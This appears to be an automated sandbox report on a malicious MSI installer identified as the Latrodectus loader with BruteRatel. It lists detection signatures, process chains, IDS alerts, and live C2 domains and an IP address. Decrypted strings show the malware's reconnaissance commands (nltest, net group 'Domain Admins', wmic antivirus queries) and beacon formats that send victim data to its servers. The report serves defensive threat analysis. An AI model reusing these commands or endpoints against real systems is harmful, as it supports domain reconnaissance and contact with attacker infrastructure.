Windows Analysis Report
lavi.msi

Overview

General Information

Sample name: lavi.msi
Analysis ID: 1555052
MD5: c65899e2519f4ad21fb4b97f0a113362
SHA1: a1f854c29a69c19949499fca5e24b02b97be46fd
SHA256: 025abbec1724b9180b369fe116da9d90ae47a4996f6a4e28e8a947bac1e0c741
Tags: msi, user-pr0xylife

Detection

BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msiexec.exe (PID: 7812 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavi.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7892 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7960 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 43BC20CBC49545F265F1331995ABDA6D MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI2701.tmp (PID: 8028 cmdline: "C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, Object MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8104 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
Name: Brute Ratel C4, BruteRatel
Description: Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Latrodectus, Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus
{"C2 url": ["https://rolefenik.com/test/", "https://ergiholim.com/test/"], "Group Name": "Eta", "Campaign ID": 4037194951}
Source | Rule | Description | Author | Strings
00000006.00000003.2286244860.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000006.00000003.2286424940.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_2 | Yara detected BruteRatel | Joe Security |
0000000B.00000002.3902483361.000000000AB4C000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
Process Memory Space: rundll32.exe PID: 8104 | JoeSecurity_BruteRatel_2 | Yara detected BruteRatel | Joe Security |

System Summary

Source: Process started | Author: elhoim, CD_ROM_ | Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 8104, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4084, ProcessName: explorer.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T10:59:33.580098+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-13T11:00:14.462381+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.8 | 58082 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T11:02:03.714625+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58086 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:07.268279+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58087 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:10.283737+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58088 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:13.168299+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58089 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:16.484077+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58090 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:20.188077+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58091 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:22.999986+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58092 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:25.685711+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58093 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:28.465289+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58094 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:31.244083+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58095 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:33.980071+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58096 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:36.615479+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58097 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:39.128499+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58098 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:42.362240+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58100 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:45.124335+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58101 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:47.841462+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58102 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:50.512085+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58103 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:53.401221+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58104 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:56.355343+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58105 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:59.151142+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58106 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:02.236881+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58107 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:05.299439+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58108 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:08.311583+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58109 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:11.897932+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58110 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:15.448359+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58111 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:18.492050+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58112 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:21.409415+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 58114 | 172.67.191.232 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T11:02:03.752840+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58086 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:09.570724+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58087 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:12.418373+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58088 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:15.758465+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58089 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:19.491450+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58090 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:22.228995+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58091 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:24.993858+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58092 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:27.739909+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58093 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:30.572059+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58094 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:33.251417+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58095 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:35.921884+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58096 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:38.445231+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58097 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:41.675497+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58098 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:44.403551+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58100 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:47.142344+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58101 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:49.821123+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58102 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:52.623944+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58103 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:55.224697+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58104 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:58.374492+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58105 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:01.524516+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58106 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:04.592517+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58107 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:07.619002+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58108 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:11.207625+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58109 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:14.603701+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58110 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:17.830438+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58111 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:20.528808+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58112 | 172.67.191.232 | 443 | TCP
2024-11-13T11:03:23.232250+0100 | 2048735 | 1 | A Network Trojan was detected | 192.168.2.8 | 58114 | 172.67.191.232 | 443 | TCP


AV Detection

Source: https://xomamox.com:8877/49 | Avira URL Cloud: Label: malware
Source: https://xomamox.com:8877/gump.phpx | Avira URL Cloud: Label: malware
Source: https://xomamox.com:8877/gump.php | Avira URL Cloud: Label: malware
Source: https://xomamox.com:8877/forest.phpl | Avira URL Cloud: Label: malware
Source: https://xomamox.com:8877/forest.php | Avira URL Cloud: Label: malware
Source: https://xomamox.com:8877/re | Avira URL Cloud: Label: malware
Source: https://xomamox.com:8877/gump.php- | Avira URL Cloud: Label: malware
Source: https://xomamox.com:8877/ | Avira URL Cloud: Label: malware
Source: https://xomamox.com/ | Avira URL Cloud: Label: malware
Source: https://xomamox.com:8877/T | Avira URL Cloud: Label: malware
Source: 11.0.explorer.exe.2be0000.0.raw.unpack | Malware Configuration Extractor: Latrodectus {"C2 url": ["https://rolefenik.com/test/", "https://ergiholim.com/test/"], "Group Name": "Eta", "Campaign ID": 4037194951}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 11.0.explorer.exe.2be0000.0.raw.unpack | String decryptor (one decrypted string per entry):
  • /c ipconfig /all
  • /c systeminfo
  • C:\Windows\System32\cmd.exe
  • C:\Windows\System32\cmd.exe
  • /c nltest /domain_trusts
  • /c net view /all
  • C:\Windows\System32\cmd.exe
  • /c nltest /domain_trusts /all_trusts
  • C:\Windows\System32\cmd.exe
  • /c net view /all /domain
  • &ipconfig=
  • C:\Windows\System32\cmd.exe
  • C:\Windows\System32\cmd.exe
  • /c net group "Domain Admins" /domain
  • C:\Windows\System32\cmd.exe
  • /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
  • C:\Windows\System32\wbem\wmic.exe
  • /c net config workstation
  • C:\Windows\System32\cmd.exe
  • /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
  • C:\Windows\System32\cmd.exe
  • /c whoami /groups
  • C:\Windows\System32\cmd.exe
  • &systeminfo=
  • &domain_trusts=
  • &domain_trusts_all=
  • &net_view_all_domain=
  • &net_view_all=
  • &net_group=
  • &wmic=
  • &net_config_ws=
  • &net_wmic_av=
  • &whoami_group=
  • "pid":
  • "%d",
  • "proc":
  • "%s",
  • "subproc": [
  • &proclist=[
  • "pid":
  • "%d",
  • "proc":
  • "%s",
  • "subproc": [
  • &desklinks=[
  • *.*
  • "%s"
  • Update_%x
  • Custom_update
  • .dll
  • .exe
  • Error
  • runnung
  • %s/%s
  • front
  • /files/
  • Eta
  • Content-Type: application/x-www-form-urlencoded
  • Cookie:
  • POST
  • GET
  • curl/7.88.1
  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  • CLEARURL
  • URLS
  • COMMAND
  • ERROR
  • SS7XhbPzgfVM1dzNk6a5t4GCj2QHTzkG4lzOwmFYgoDfGJT1jsnOCzxmYz5jacET
  • counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  • counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  • counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  • [{"data":"
  • "}]
  • &dpost=
  • https://rolefenik.com/test/
  • https://ergiholim.com/test/
  • \*.dll
  • AppData
  • Desktop
  • Startup
  • Personal
  • Local AppData
  • <html>
  • <!DOCTYPE
  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • %s%d.dll
  • C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
  • Content-Length: 0
  • C:\WINDOWS\SYSTEM32\rundll32.exe %s
  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  • Content-Type: application/dns-message
  • Content-Type: application/ocsp-request
  • 12345
  • 12345
  • &stiller=
  • %s%d.exe
  • %x%x
  • &mac=
  • %02x
  • :%02x
  • &computername=%s
  • &domain=%s
  • %04X%04X%04X%04X%08X%04X
  • LogonTrigger
  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  • %04X%04X%04X%04X%08X%04X
  • \Registry\Machine\
  • TimeTrigger
  • PT0H%02dM
  • %04d-%02d-%02dT%02d:%02d:%02d
  • PT0S
  • \update_data.dat
Source: unknown | HTTPS traffic detected: 172.67.191.232:443 -> 192.168.2.8:58086 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.191.232:443 -> 192.168.2.8:58097 version: TLS 1.2
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: | source: MSI2701.tmp, 00000004.00000000.1441195178.0000000000507000.00000002.00000001.01000000.00000003.sdmp, MSI2701.tmp, 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp, lavi.msi, 5d243d.msi.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr
Source: Binary string: eplgOutlook.pdb | source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb | source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI25B6.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn | source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI25B6.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb | source: MSI2701.tmp, 00000004.00000000.1441195178.0000000000507000.00000002.00000001.01000000.00000003.sdmp, MSI2701.tmp, 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp, lavi.msi, 5d243d.msi.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\msiexec.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004FAF79 FindFirstFileExW,4_2_004FAF79
Source: C:\Windows\explorer.exe | Code function: 11_2_02BEA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,11_2_02BEA8E0
Source: C:\Windows\explorer.exe | Code function: 11_2_02BF04B8 FindFirstFileA,11_2_02BF04B8
Source: C:\Windows\explorer.exe | Code function: 11_2_02BF04C0 FindFirstFileW,11_2_02BF04C0
Source: C:\Windows\explorer.exe | Code function: 11_2_02BE2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,11_2_02BE2B28

Networking

            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58098 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58101 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58096 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58093 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58090 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58088 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58102 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58097 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58107 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58100 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58087 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58095 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58103 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58094 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58092 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58089 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58105 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58091 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58110 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58114 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58104 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58108 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58109 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58086 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58106 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58112 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58111 -> 172.67.191.232:443
            Source: C:\Windows\System32\rundll32.exe | Network Connect: 80.66.76.106 8877
            Source: Malware configuration extractor | URLs: https://rolefenik.com/test/
            Source: Malware configuration extractor | URLs: https://ergiholim.com/test/
            Source: global traffic | TCP traffic: 192.168.2.8:49705 -> 80.66.76.106:8877
            Source: Joe Sandbox View | IP Address: 80.66.76.106 80.66.76.106
            Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58093 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58089 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58091 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58096 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58108 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58087 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58100 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58106 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58112 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58101 -> 172.67.191.232:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:58102 -> 172.67.191.232:443
